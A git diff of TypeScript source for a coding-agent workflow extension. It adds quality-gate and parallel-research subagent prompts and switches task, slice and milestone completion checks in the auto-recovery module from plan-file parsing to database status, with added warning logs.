+    const assessmentPath = resolveSliceFile(base, mid, sid, "ASSESSMENT");
+    const assessmentRel = relSliceFile(base, mid, sid, "ASSESSMENT");
+    const assessmentInline = await inlineFileOptional(assessmentPath, assessmentRel, `${sid} Assessment`);
+    if (assessmentInline) inlined.push(assessmentInline);
+  }
+
+  // Aggregate unresolved follow-ups and known limitations across slices
+  const outstandingItems: string[] = [];
+  for (const sid of valSliceIds) {
+    const summaryPath = resolveSliceFile(base, mid, sid, "SUMMARY");
+    if (!summaryPath) continue;
+    const content = await loadFile(summaryPath);
+    if (!content) continue;
+    const summary = parseSummary(content);
+    if (summary.followUps) outstandingItems.push(`- **${sid} Follow-ups:** ${summary.followUps.trim()}`);
+    if (summary.knownLimitations) outstandingItems.push(`- **${sid} Known Limitations:** ${summary.knownLimitations.trim()}`);
+  }
+  if (outstandingItems.length > 0) {
+    inlined.push(`### Outstanding Items (aggregated from slice summaries)\n\nThese follow-ups and known limitations were documented during slice completion but have not been resolved.\n\n${outstandingItems.join('\n')}`);
   }
 
   // Inline existing VALIDATION file if this is a re-validation round
@@ -1303,7 +1651,7 @@ export async function buildValidateMilestonePrompt(
 
   // Inline root GSD files
   if (inlineLevel !== "minimal") {
-    const requirementsInline = await inlineRequirementsFromDb(base, undefined, inlineLevel);
+    const requirementsInline = await inlineRequirementsFromDb(base, mid, undefined, inlineLevel);
     if (requirementsInline) inlined.push(requirementsInline);
     const decisionsInline = await inlineDecisionsFromDb(base, mid, undefined, inlineLevel);
     if (decisionsInline) inlined.push(decisionsInline);
@@ -1331,6 +1679,12 @@ export async function buildValidateMilestonePrompt(
     inlinedContext,
     validationPath: validationOutputPath,
     remediationRound: String(remediationRound),
+    skillActivation: buildSkillActivationBlock({
+      base,
+      milestoneId: mid,
+      milestoneTitle: midTitle,
+      extraContext: [inlinedContext],
+    }),
   });
 }
 
@@ -1341,9 +1695,13 @@ export async function buildReplanSlicePrompt(
   const roadmapRel = relMilestoneFile(base, mid, "ROADMAP");
   const slicePlanPath = resolveSliceFile(base, mid, sid, "PLAN");
   const slicePlanRel = relSliceFile(base, mid, sid, "PLAN");
+  const sliceContextPath = resolveSliceFile(base, mid, sid, "CONTEXT");
+  const sliceContextRel = relSliceFile(base, mid, sid, "CONTEXT");
 
   const inlined: string[] = [];
   inlined.push(await inlineFile(roadmapPath, roadmapRel, "Milestone Roadmap"));
+  const sliceCtxInline = await inlineFileOptional(sliceContextPath, sliceContextRel, "Slice Context (from discussion)");
+  if (sliceCtxInline) inlined.push(sliceCtxInline);
   inlined.push(await inlineFile(slicePlanPath, slicePlanRel, "Current Slice Plan"));
 
   // Find the blocker task summary — the completed task with blocker_discovered: true
@@ -1386,8 +1744,8 @@ export async function buildReplanSlicePrompt(
         `- **${c.id}**: "${c.text}" — ${c.rationale ?? "no rationale"}`
       ).join("\n");
     }
-  } catch {
-    // Non-fatal — captures module may not be available
+  } catch (err) {
+    logWarning("prompt", `loadReplanCaptures failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
   return loadPrompt("replan-slice", {
@@ -1430,8 +1788,8 @@ export async function buildRunUatPrompt(
 
   const inlinedContext = capPreamble(`## Inlined Context (preloaded — do not re-read these files)\n\n${inlined.join("\n\n---\n\n")}`);
 
-  const uatResultPath = join(base, relSliceFile(base, mid, sliceId, "UAT-RESULT"));
-  const uatType = extractUatType(uatContent) ?? "artifact-driven";
+  const uatResultPath = join(base, relSliceFile(base, mid, sliceId, "ASSESSMENT"));
+  const uatType = getUatType(uatContent);
 
   return loadPrompt("run-uat", {
     workingDirectory: base,
@@ -1441,6 +1799,12 @@ export async function buildRunUatPrompt(
     uatResultPath,
     uatType,
     inlinedContext,
+    skillActivation: buildSkillActivationBlock({
+      base,
+      milestoneId: mid,
+      sliceId,
+      extraContext: [inlinedContext],
+    }),
   });
 }
 
@@ -1452,14 +1816,18 @@ export async function buildReassessRoadmapPrompt(
   const roadmapRel = relMilestoneFile(base, mid, "ROADMAP");
   const summaryPath = resolveSliceFile(base, mid, completedSliceId, "SUMMARY");
   const summaryRel = relSliceFile(base, mid, completedSliceId, "SUMMARY");
+  const sliceContextPath = resolveSliceFile(base, mid, completedSliceId, "CONTEXT");
+  const sliceContextRel = relSliceFile(base, mid, completedSliceId, "CONTEXT");
 
   const inlined: string[] = [];
   inlined.push(await inlineFile(roadmapPath, roadmapRel, "Current Roadmap"));
+  const sliceCtxInline = await inlineFileOptional(sliceContextPath, sliceContextRel, "Slice Context (from discussion)");
+  if (sliceCtxInline) inlined.push(sliceCtxInline);
   inlined.push(await inlineFile(summaryPath, summaryRel, `${completedSliceId} Summary`));
   if (inlineLevel !== "minimal") {
     const projectInline = await inlineProjectFromDb(base);
     if (projectInline) inlined.push(projectInline);
-    const requirementsInline = await inlineRequirementsFromDb(base, undefined, inlineLevel);
+    const requirementsInline = await inlineRequirementsFromDb(base, mid, undefined, inlineLevel);
     if (requirementsInline) inlined.push(requirementsInline);
     const decisionsInline = await inlineDecisionsFromDb(base, mid, undefined, inlineLevel);
     if (decisionsInline) inlined.push(decisionsInline);
@@ -1481,15 +1849,11 @@ export async function buildReassessRoadmapPrompt(
         `- **${c.id}**: "${c.text}" — ${c.rationale ?? "deferred during triage"}`
       ).join("\n");
     }
-  } catch {
-    // Non-fatal — captures module may not be available
+  } catch (err) {
+    logWarning("prompt", `loadDeferredCaptures failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
-  const reassessPrefs = loadEffectiveGSDPreferences();
-  const reassessCommitDocsEnabled = reassessPrefs?.preferences?.git?.commit_docs !== false;
-  const reassessCommitInstruction = reassessCommitDocsEnabled
-    ? `Commit: \`docs(${mid}): reassess roadmap after ${completedSliceId}\`. Stage only the .gsd/milestones/ files you changed — do not stage .gsd/STATE.md or other runtime files.`
-    : "Do not commit — planning docs are not tracked in git for this project.";
+  const reassessCommitInstruction = "Do not commit — .gsd/ planning docs are managed externally and not tracked in git.";
 
   return loadPrompt("reassess-roadmap", {
     workingDirectory: base,
@@ -1497,11 +1861,16 @@ export async function buildReassessRoadmapPrompt(
     milestoneTitle: midTitle,
     completedSliceId,
     roadmapPath: roadmapRel,
-    completedSliceSummaryPath: summaryRel,
     assessmentPath,
     inlinedContext,
     deferredCaptures,
     commitInstruction: reassessCommitInstruction,
+    skillActivation: buildSkillActivationBlock({
+      base,
+      milestoneId: mid,
+      milestoneTitle: midTitle,
+      extraContext: [inlinedContext, deferredCaptures],
+    }),
   });
 }
 
@@ -1581,6 +1950,126 @@ export async function buildReactiveExecutePrompt(
   });
 }
 
+// ─── Gate Evaluation ──────────────────────────────────────────────────────
+
+const GATE_QUESTIONS: Record<string, { question: string; guidance: string }> = {
+  Q3: {
+    question: "How can this be exploited?",
+    guidance: [
+      "Identify abuse scenarios: parameter tampering, replay attacks, privilege escalation.",
+      "Map data exposure risks: PII, tokens, secrets accessible through this slice.",
+      "Define input trust boundaries: untrusted user input reaching DB, API, or filesystem.",
+      "If none apply, return verdict 'omitted' with rationale explaining why.",
+    ].join("\n"),
+  },
+  Q4: {
+    question: "What existing promises does this break?",
+    guidance: [
+      "List which existing requirements (R001, R003, etc.) are touched by this slice.",
+      "Identify what must be re-tested after shipping.",
+      "Flag decisions that should be revisited given the new scope.",
+      "If no existing requirements are affected, return verdict 'omitted'.",
+    ].join("\n"),
+  },
+};
+
+export async function buildParallelResearchSlicesPrompt(
+  mid: string,
+  midTitle: string,
+  slices: Array<{ id: string; title: string }>,
+  basePath: string,
+): Promise<string> {
+  // Build individual research-slice prompts for each slice
+  const subagentSections: string[] = [];
+  for (const slice of slices) {
+    const slicePrompt = await buildResearchSlicePrompt(mid, midTitle, slice.id, slice.title, basePath);
+    subagentSections.push([
+      `### ${slice.id}: ${slice.title}`,
+      "",
+      "Use this as the prompt for a `subagent` call (agent: `gsd-executor` or the default agent):",
+      "",
+      "```",
+      slicePrompt,
+      "```",
+    ].join("\n"));
+  }
+
+  return loadPrompt("parallel-research-slices", {
+    mid,
+    midTitle,
+    sliceCount: String(slices.length),
+    sliceList: slices.map((s) => `- **${s.id}**: ${s.title}`).join("\n"),
+    subagentPrompts: subagentSections.join("\n\n---\n\n"),
+  });
+}
+
+export async function buildGateEvaluatePrompt(
+  mid: string, midTitle: string, sid: string, sTitle: string,
+  base: string,
+): Promise<string> {
+  const pending = getPendingGates(mid, sid, "slice");
+
+  // Load the slice plan for context
+  const planFile = resolveSliceFile(base, mid, sid, "PLAN");
+  const planContent = planFile ? (await loadFile(planFile)) ?? "(plan file empty)" : "(plan file not found)";
+
+  // Build per-gate subagent prompts
+  const subagentSections: string[] = [];
+  const gateListLines: string[] = [];
+
+  for (const gate of pending) {
+    const meta = GATE_QUESTIONS[gate.gate_id];
+    if (!meta) continue;
+
+    gateListLines.push(`- **${gate.gate_id}**: ${meta.question}`);
+
+    const subPrompt = [
+      `You are evaluating quality gate **${gate.gate_id}** for slice ${sid} (${sTitle}).`,
+      "",
+      `## Question: ${meta.question}`,
+      "",
+      meta.guidance,
+      "",
+      "## Slice Plan",
+      "",
+      planContent,
+      "",
+      "## Instructions",
+      "",
+      "Analyze the slice plan above and answer the gate question.",
+      `Call the \`gsd_save_gate_result\` tool with:`,
+      `- \`milestoneId\`: "${mid}"`,
+      `- \`sliceId\`: "${sid}"`,
+      `- \`gateId\`: "${gate.gate_id}"`,
+      "- `verdict`: \"pass\" (no concerns), \"flag\" (concerns found), or \"omitted\" (not applicable)",
+      "- `rationale`: one-sentence justification",
+      "- `findings`: detailed markdown findings (or empty if omitted)",
+    ].join("\n");
+
+    subagentSections.push([
+      `### ${gate.gate_id}: ${meta.question}`,
+      "",
+      "Use this as the prompt for a `subagent` call:",
+      "",
+      "```",
+      subPrompt,
+      "```",
+    ].join("\n"));
+  }
+
+  return loadPrompt("gate-evaluate", {
+    workingDirectory: base,
+    milestoneId: mid,
+    milestoneTitle: midTitle,
+    sliceId: sid,
+    sliceTitle: sTitle,
+    slicePlanContent: planContent,
+    gateCount: String(pending.length),
+    gateList: gateListLines.join("\n"),
+    subagentPrompts: subagentSections.join("\n\n---\n\n"),
+  });
+}
+
 export async function buildRewriteDocsPrompt(
   mid: string, midTitle: string,
   activeSlice: { id: string; title: string } | null,
@@ -1598,16 +2087,30 @@ export async function buildRewriteDocsPrompt(
       docList.push(`- Slice plan: \`${slicePlanRel}\``);
       const tDir = resolveTasksDir(base, mid, sid);
       if (tDir) {
-        const planContent = await loadFile(slicePlanPath);
-        if (planContent) {
-          const plan = parsePlan(planContent);
-          for (const task of plan.tasks) {
-            if (!task.done) {
-              const taskPlanPath = resolveTaskFile(base, mid, sid, task.id, "PLAN");
-              if (taskPlanPath) {
-                const taskRelPath = `${relSlicePath(base, mid, sid)}/tasks/${task.id}-PLAN.md`;
-                docList.push(`- Task plan: \`${taskRelPath}\``);
-              }
+        // DB primary path — get incomplete tasks
+        let incompleteTasks: { id: string }[] | null = null;
+        try {
+          const { isDbAvailable, getSliceTasks } = await import("./gsd-db.js");
+          if (isDbAvailable()) {
+            incompleteTasks = getSliceTasks(mid, sid)
+              .filter(t => t.status !== "complete" && t.status !== "done")
+              .map(t => ({ id: t.id }));
+          }
+        } catch (err) {
+          logWarning("prompt", `buildRewriteDocsPrompt DB task lookup failed: ${err instanceof Error ? err.message : String(err)}`);
+        }
+
+        if (!incompleteTasks) {
+          // DB unavailable — no task data to inline
+          incompleteTasks = [];
+        }
+
+        if (incompleteTasks) {
+          for (const task of incompleteTasks) {
+            const taskPlanPath = resolveTaskFile(base, mid, sid, task.id, "PLAN");
+            if (taskPlanPath) {
+              const taskRelPath = `${relSlicePath(base, mid, sid)}/tasks/${task.id}-PLAN.md`;
+              docList.push(`- Task plan: \`${taskRelPath}\``);
             }
           }
         }
diff --git a/src/resources/extensions/gsd/auto-recovery.ts b/src/resources/extensions/gsd/auto-recovery.ts
index c34dbac7d..92086af16 100644
--- a/src/resources/extensions/gsd/auto-recovery.ts
+++ b/src/resources/extensions/gsd/auto-recovery.ts
@@ -9,10 +9,14 @@
 
 import type { ExtensionContext } from "@gsd/pi-coding-agent";
 import { parseUnitId } from "./unit-id.js";
+import { appendEvent } from "./workflow-events.js";
 import { atomicWriteSync } from "./atomic-write.js";
-import { clearUnitRuntimeRecord } from "./unit-runtime.js";
-import { clearParseCache, parseRoadmap, parsePlan } from "./files.js";
+import { clearParseCache } from "./files.js";
+import { parseRoadmap as parseLegacyRoadmap, parsePlan as parseLegacyPlan } from "./parsers-legacy.js";
+import { isDbAvailable, getTask, getSlice, getSliceTasks, getPendingGates, updateTaskStatus, updateSliceStatus } from "./gsd-db.js";
 import { isValidationTerminal } from "./state.js";
+import { getErrorMessage } from "./error-utils.js";
+import { logWarning, logError } from "./workflow-logger.js";
 import {
   nativeConflictFiles,
   nativeCommit,
@@ -22,23 +26,17 @@ import {
   nativeResetHard,
 } from "./native-git-bridge.js";
 import {
-  resolveMilestonePath,
   resolveSlicePath,
   resolveSliceFile,
   resolveTasksDir,
   resolveTaskFiles,
   relMilestoneFile,
   relSliceFile,
-  relSlicePath,
-  relTaskFile,
-  buildMilestoneFileName,
   buildSliceFileName,
-  buildTaskFileName,
   resolveMilestoneFile,
   clearPathCache,
   resolveGsdRootFile,
 } from "./paths.js";
-import { markSliceDoneInRoadmap } from "./roadmap-mutations.js";
 import {
   existsSync,
   mkdirSync,
@@ -48,102 +46,36 @@ import {
 } from "node:fs";
 import { execFileSync } from "node:child_process";
 import { dirname, join } from "node:path";
+import {
+  resolveExpectedArtifactPath,
+  diagnoseExpectedArtifact,
+} from "./auto-artifact-paths.js";
+
+// Re-export so existing consumers of auto-recovery.ts keep working.
+export { resolveExpectedArtifactPath, diagnoseExpectedArtifact };
 
 // ─── Artifact Resolution & Verification ───────────────────────────────────────
 
-/**
- * Resolve the expected artifact for a unit to an absolute path.
- */
-export function resolveExpectedArtifactPath(
-  unitType: string,
-  unitId: string,
-  base: string,
-): string | null {
-  const parts = unitId.split("/");
-  const mid = parts[0]!;
-  const sid = parts[1];
-  switch (unitType) {
-    case "discuss-milestone": {
-      const dir = resolveMilestonePath(base, mid);
-      return dir ? join(dir, buildMilestoneFileName(mid, "CONTEXT")) : null;
-    }
-    case "research-milestone": {
-      const dir = resolveMilestonePath(base, mid);
-      return dir ? join(dir, buildMilestoneFileName(mid, "RESEARCH")) : null;
-    }
-    case "plan-milestone": {
-      const dir = resolveMilestonePath(base, mid);
-      return dir ? join(dir, buildMilestoneFileName(mid, "ROADMAP")) : null;
-    }
-    case "research-slice": {
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir ? join(dir, buildSliceFileName(sid!, "RESEARCH")) : null;
-    }
-    case "plan-slice": {
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir ? join(dir, buildSliceFileName(sid!, "PLAN")) : null;
-    }
-    case "reassess-roadmap": {
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir ? join(dir, buildSliceFileName(sid!, "ASSESSMENT")) : null;
-    }
-    case "run-uat": {
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir ? join(dir, buildSliceFileName(sid!, "UAT-RESULT")) : null;
-    }
-    case "execute-task": {
-      const tid = parts[2];
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir && tid
-        ? join(dir, "tasks", buildTaskFileName(tid, "SUMMARY"))
-        : null;
-    }
-    case "complete-slice": {
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir ? join(dir, buildSliceFileName(sid!, "SUMMARY")) : null;
-    }
-    case "validate-milestone": {
-      const dir = resolveMilestonePath(base, mid);
-      return dir ? join(dir, buildMilestoneFileName(mid, "VALIDATION")) : null;
-    }
-    case "complete-milestone": {
-      const dir = resolveMilestonePath(base, mid);
-      return dir ? join(dir, buildMilestoneFileName(mid, "SUMMARY")) : null;
-    }
-    case "replan-slice": {
-      const dir = resolveSlicePath(base, mid, sid!);
-      return dir ? join(dir, buildSliceFileName(sid!, "REPLAN")) : null;
-    }
-    case "rewrite-docs":
-      return null;
-    case "reactive-execute":
-      // Reactive execute produces multiple task summaries — verified separately
-      return null;
-    default:
-      return null;
-  }
-}
-
 /**
  * Check whether a milestone produced implementation artifacts (non-`.gsd/` files)
  * in the git history. Uses `git log --name-only` to inspect all commits on the
  * current branch that touch files outside `.gsd/`.
  *
- * Returns true if at least one non-`.gsd/` file was committed, false otherwise.
- * Non-fatal: returns true on git errors to avoid blocking the pipeline when
- * running outside a git repo (e.g., tests).
+ * Returns "present" if implementation files found, "absent" if only .gsd/ files,
+ * "unknown" if git is unavailable or check failed (callers decide how to handle).
  */
-export function hasImplementationArtifacts(basePath: string): boolean {
+export function hasImplementationArtifacts(basePath: string): "present" | "absent" | "unknown" {
   try {
-    // Verify we're in a git repo — fail open if not
+    // Verify we're in a git repo
     try {
       execFileSync("git", ["rev-parse", "--is-inside-work-tree"], {
         cwd: basePath,
         stdio: ["ignore", "pipe", "pipe"],
         encoding: "utf-8",
       });
-    } catch {
-      return true;
+    } catch (e) {
+      logWarning("recovery", `git rev-parse check failed: ${(e as Error).message}`);
+      return "unknown";
     }
 
     // Strategy: check `git diff --name-only` against the merge-base with the
@@ -153,18 +85,19 @@ export function hasImplementationArtifacts(basePath: string): boolean {
     const mainBranch = detectMainBranch(basePath);
     const changedFiles = getChangedFilesSinceBranch(basePath, mainBranch);
 
-    // No files changed at all — fail open (could be detached HEAD, single-
+    // No files changed at all — unknown (could be detached HEAD, single-
     // commit repo, or other edge case where git diff returns nothing).
-    if (changedFiles.length === 0) return true;
+    if (changedFiles.length === 0) return "unknown";
 
     // Filter out .gsd/ files — only implementation files count.
     // If every changed file is under .gsd/, the milestone produced no
     // implementation code (#1703).
     const implFiles = changedFiles.filter(f => !f.startsWith(".gsd/") && !f.startsWith(".gsd\\"));
-    return implFiles.length > 0;
-  } catch {
-    // Non-fatal — if git operations fail, don't block the pipeline
-    return true;
+    return implFiles.length > 0 ? "present" : "absent";
+  } catch (e) {
+    // Non-fatal — if git operations fail, return unknown so callers can decide
+    logWarning("recovery", `implementation artifact check failed: ${(e as Error).message}`);
+    return "unknown";
   }
 }
 
@@ -179,8 +112,9 @@ function detectMainBranch(basePath: string): string {
       encoding: "utf-8",
     });
     if (result.trim()) return "main";
-  } catch {
-    // main doesn't exist
+  } catch (_) {
+    // Expected — main doesn't exist, try master next
+    void _;
   }
   try {
     const result = execFileSync("git", ["rev-parse", "--verify", "master"], {
@@ -189,10 +123,13 @@ function detectMainBranch(basePath: string): string {
       encoding: "utf-8",
     });
     if (result.trim()) return "master";
-  } catch {
-    // master doesn't exist either
+  } catch (_) {
+    // Expected — master doesn't exist either
+    void _;
   }
-  return "main"; // default fallback
+  // Neither main nor master found — warn and fall back
+  logWarning("recovery", "neither main nor master branch found, defaulting to main");
+  return "main";
 }
 
 /**
@@ -214,8 +151,9 @@ function getChangedFilesSinceBranch(basePath: string, targetBranch: string): str
       ).trim();
       return result ? result.split("\n").filter(Boolean) : [];
     }
-  } catch {
+  } catch (err) {
     // merge-base failed — fall back
+    logWarning("recovery", `merge-base detection failed: ${err instanceof Error ? err.message : String(err)}`);
   }
 
   // Fallback: check last 20 commits
@@ -225,7 +163,8 @@ function getChangedFilesSinceBranch(basePath: string, targetBranch: string): str
       { cwd: basePath, stdio: ["ignore", "pipe", "pipe"], encoding: "utf-8" },
     ).trim();
     return result ? [...new Set(result.split("\n").filter(Boolean))] : [];
-  } catch {
+  } catch (e) {
+    logWarning("recovery", `git log fallback failed: ${(e as Error).message}`);
     return [];
   }
 }
@@ -266,13 +205,8 @@ export function verifyExpectedArtifact(
   // Reactive-execute: verify that each dispatched task's summary exists.
   // The unitId encodes the batch: "{mid}/{sid}/reactive+T02,T03"
   if (unitType === "reactive-execute") {
-    const parts = unitId.split("/");
-    const mid = parts[0];
-    const sidAndBatch = parts[1];
-    const batchPart = parts[2]; // "reactive+T02,T03"
-    if (!mid || !sidAndBatch || !batchPart) return false;
-
-    const sid = sidAndBatch;
+    const { milestone: mid, slice: sid, task: batchPart } = parseUnitId(unitId);
+    if (!mid || !sid || !batchPart) return false;
     const plusIdx = batchPart.indexOf("+");
     if (plusIdx === -1) {
       // Legacy format "reactive" without batch IDs — fall back to "any summary"
@@ -301,6 +235,32 @@ export function verifyExpectedArtifact(
     return true;
   }
 
+  // Gate-evaluate: verify that each dispatched gate has been resolved in the DB.
+  // The unitId encodes the batch: "{mid}/{sid}/gates+Q3,Q4"
+  if (unitType === "gate-evaluate") {
+    const { milestone: mid, slice: sid, task: batchPart } = parseUnitId(unitId);
+    if (!mid || !sid || !batchPart) return false;
+
+    const plusIdx = batchPart.indexOf("+");
+    if (plusIdx === -1) return true; // no specific gates encoded — pass
+
+    const gateIds = batchPart.slice(plusIdx + 1).split(",").filter(Boolean);
+    if (gateIds.length === 0) return true;
+
+    try {
+      const pending = getPendingGates(mid, sid, "slice");
+      const pendingIds = new Set(pending.map((g: any) => g.gate_id));
+      // All dispatched gates must no longer be pending
+      for (const gid of gateIds) {
+        if (pendingIds.has(gid)) return false;
+      }
+    } catch (err) {
+      // DB unavailable — treat as verified to avoid blocking
+      logWarning("recovery", `gate-evaluate DB check failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+    return true;
+  }
+
   const absPath = resolveExpectedArtifactPath(unitType, unitId, base);
   // For unit types with no verifiable artifact (null path), the parent directory
   // is missing on disk — treat as stale completion state so the key gets evicted (#313).
@@ -325,24 +285,32 @@ export function verifyExpectedArtifact(
     if (!hasCheckboxTask && !hasHeadingTask) return false;
   }
 
-  // execute-task must also have its checkbox marked [x] in the slice plan.
-  // Heading-style plans (### T01 -- Title) have no checkbox — the task summary
-  // file existence (checked above via resolveExpectedArtifactPath) is sufficient.
+  // execute-task: DB status is authoritative. Fall back to checked-checkbox
+  // detection when the DB is unavailable (unmigrated projects).
   if (unitType === "execute-task") {
-    const parts = unitId.split("/");
-    const mid = parts[0];
-    const sid = parts[1];
-    const tid = parts[2];
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
     if (mid && sid && tid) {
-      const planAbs = resolveSliceFile(base, mid, sid, "PLAN");
-      if (planAbs && existsSync(planAbs)) {
-        const planContent = readFileSync(planAbs, "utf-8");
-        const escapedTid = tid.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
-        const cbRe = new RegExp(`^- \\[[xX]\\] \\*\\*${escapedTid}:`, "m");
-        const hdRe = new RegExp(`^#{2,4}\\s+${escapedTid}\\s*(?:--|—|:)`, "m");
-        // Heading-style entries count as verified (no checkbox to toggle);
-        // checkbox-style entries require [x].
-        if (!cbRe.test(planContent) && !hdRe.test(planContent)) return false;
+      const dbTask = getTask(mid, sid, tid);
+      if (dbTask) {
+        // DB available — trust it
+        if (dbTask.status !== "complete" && dbTask.status !== "done") return false;
+      } else if (!isDbAvailable()) {
+        // LEGACY: Pre-migration fallback for projects without DB.
+        // Require a CHECKED checkbox — a bare heading or unchecked checkbox
+        // does not prove gsd_complete_task ran. Summary file on disk alone
+        // is not sufficient evidence (could be a rogue write) (#3607).
+        const planAbs = resolveSliceFile(base, mid, sid, "PLAN");
+        if (planAbs && existsSync(planAbs)) {
+          const planContent = readFileSync(planAbs, "utf-8");
+          const escapedTid = tid.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
+          const cbRe = new RegExp(`^- \\[[xX]\\] \\*\\*${escapedTid}:`, "m");
+          if (!cbRe.test(planContent)) return false;
+        } else {
+          return false; // no plan file → cannot verify
+        }
+      } else {
+        // DB available but task row not found — completion tool never ran (#3607)
+        return false;
       }
     }
   }
@@ -352,57 +320,72 @@ export function verifyExpectedArtifact(
   // but omitted T{tid}-PLAN.md files would be marked complete, causing execute-task
   // to dispatch with a missing task plan (see issue #739).
   if (unitType === "plan-slice") {
-    const parts = unitId.split("/");
-    const mid = parts[0];
-    const sid = parts[1];
+    const { milestone: mid, slice: sid } = parseUnitId(unitId);
     if (mid && sid) {
       try {
-        const planContent = readFileSync(absPath, "utf-8");
-        const plan = parsePlan(planContent);
-        const tasksDir = resolveTasksDir(base, mid, sid);
-        if (plan.tasks.length > 0 && tasksDir) {
-          for (const task of plan.tasks) {
-            const taskPlanFile = join(tasksDir, `${task.id}-PLAN.md`);
-            if (!existsSync(taskPlanFile)) return false;
+        // DB primary path — get task IDs to verify task plan files exist
+        let taskIds: string[] | null = null;
+        if (isDbAvailable()) {
+          const tasks = getSliceTasks(mid, sid);
+          if (tasks.length > 0) taskIds = tasks.map(t => t.id);
+        }
+
+        if (!taskIds) {
+          // LEGACY: DB unavailable or no tasks in DB — parse plan file for task IDs
+          const planContent = readFileSync(absPath, "utf-8");
+          const plan = parseLegacyPlan(planContent);
+          if (plan.tasks.length > 0) taskIds = plan.tasks.map((t: { id: string }) => t.id);
+        }
+
+        if (taskIds && taskIds.length > 0) {
+          const tasksDir = resolveTasksDir(base, mid, sid);
+          if (tasksDir) {
+            for (const tid of taskIds) {
+              const taskPlanFile = join(tasksDir, `${tid}-PLAN.md`);
+              if (!existsSync(taskPlanFile)) return false;
+            }
           }
         }
-      } catch {
+      } catch (err) {
         // Parse failure — don't block; slice plan may have non-standard format
+        logWarning("recovery", `plan-slice task plan verification failed: ${err instanceof Error ? err.message : String(err)}`);
       }
     }
   }
 
-  // complete-slice must also produce a UAT file AND mark the slice [x] in the roadmap.
-  // Without the roadmap check, a crash after writing SUMMARY+UAT but before updating
-  // the roadmap causes an infinite skip loop: the idempotency key says "done" but the
-  // state machine keeps returning the same complete-slice unit (roadmap still shows
-  // the slice incomplete), so dispatchNextUnit recurses forever.
+  // complete-slice: DB status is authoritative for whether the slice is done.
+  // Fall back to file-based check (roadmap [x]) when DB is unavailable.
   if (unitType === "complete-slice") {
-    const parts = unitId.split("/");
-    const mid = parts[0];
-    const sid = parts[1];
+    const { milestone: mid, slice: sid } = parseUnitId(unitId);
     if (mid && sid) {
       const dir = resolveSlicePath(base, mid, sid);
       if (dir) {
         const uatPath = join(dir, buildSliceFileName(sid, "UAT"));
         if (!existsSync(uatPath)) return false;
       }
-      // Verify the roadmap has the slice marked [x]. If not, the completion
-      // record is stale — the unit must re-run to update the roadmap.
-      const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-      if (roadmapFile && existsSync(roadmapFile)) {
-        try {
-          const roadmapContent = readFileSync(roadmapFile, "utf-8");
-          const roadmap = parseRoadmap(roadmapContent);
-          const slice = roadmap.slices.find((s) => s.id === sid);
-          if (slice && !slice.done) return false;
-        } catch {
-          // Corrupt/unparseable roadmap — fail verification so the unit
-          // re-runs and has a chance to fix the roadmap. Silently passing
-          // here could advance past an incomplete slice.
-          return false;
+
+      const dbSlice = getSlice(mid, sid);
+      if (dbSlice) {
+        // DB available — trust it
+        if (dbSlice.status !== "complete") return false;
+      } else if (!isDbAvailable()) {
+        // LEGACY: Pre-migration fallback for projects without DB.
+        // Fall back to roadmap checkbox check via parsers-legacy
+        const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
+        if (roadmapFile && existsSync(roadmapFile)) {
+          try {
+            const roadmapContent = readFileSync(roadmapFile, "utf-8");
+            const roadmap = parseLegacyRoadmap(roadmapContent);
+            const slice = roadmap.slices.find((s) => s.id === sid);
+            if (slice && !slice.done) return false;
+          } catch (e) {
+            logWarning("recovery", `roadmap parse failed: ${(e as Error).message}`);
+            return false;
+          }
         }
       }
+      // else: DB available but slice not found — summary + UAT exist,
+      // treat as verified (slice may not be imported yet)
     }
   }
 
@@ -410,7 +393,7 @@ export function verifyExpectedArtifact(
   // A milestone with only .gsd/ plan files and zero implementation code is
   // not genuinely complete — the LLM wrote plan files but skipped actual work.
   if (unitType === "complete-milestone") {
-    if (!hasImplementationArtifacts(base)) return false;
+    if (hasImplementationArtifacts(base) === "absent") return false;
   }
 
   return true;
@@ -441,134 +424,94 @@ export function writeBlockerPlaceholder(
     `Review and replace this file before relying on downstream artifacts.`,
   ].join("\n");
   writeFileSync(absPath, content, "utf-8");
+
+  // Mark the task/slice as complete in the DB so verifyExpectedArtifact passes.
+  // Without this, the DB status stays "pending" and the dispatch loop
+  // re-derives the same unit indefinitely (#2531, #2653).
+  if (isDbAvailable()) {
+    const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
+    const ts = new Date().toISOString();
+    if (unitType === "execute-task" && mid && sid && tid) {
+      try { updateTaskStatus(mid, sid, tid, "complete", ts); } catch (e) { logWarning("recovery", `updateTaskStatus failed during context exhaustion: ${e instanceof Error ? e.message : String(e)}`); }
+      // Append event so worktree reconciliation can replay this recovery completion
+      try { appendEvent(base, { cmd: "complete-task", params: { milestoneId: mid, sliceId: sid, taskId: tid }, ts, actor: "system", trigger_reason: "blocker-placeholder-recovery" }); } catch (e) { logWarning("recovery", `appendEvent failed for task recovery: ${e instanceof Error ? e.message : String(e)}`); }
+    }
+    if (unitType === "complete-slice" && mid && sid) {
+      try { updateSliceStatus(mid, sid, "complete", ts); } catch (e) { logWarning("recovery", `updateSliceStatus failed during context exhaustion: ${e instanceof Error ? e.message : String(e)}`); }
+      try { appendEvent(base, { cmd: "complete-slice", params: { milestoneId: mid, sliceId: sid }, ts, actor: "system", trigger_reason: "blocker-placeholder-recovery" }); } catch (e) { logWarning("recovery", `appendEvent failed for slice recovery: ${e instanceof Error ? e.message : String(e)}`); }
+    }
+  }
+
   return diagnoseExpectedArtifact(unitType, unitId, base);
 }
 
-export function diagnoseExpectedArtifact(
-  unitType: string,
-  unitId: string,
-  base: string,
-): string | null {
-  const parts = unitId.split("/");
-  const mid = parts[0];
-  const sid = parts[1];
-  switch (unitType) {
-    case "discuss-milestone":
-      return `${relMilestoneFile(base, mid!, "CONTEXT")} (milestone context from discussion)`;
-    case "research-milestone":
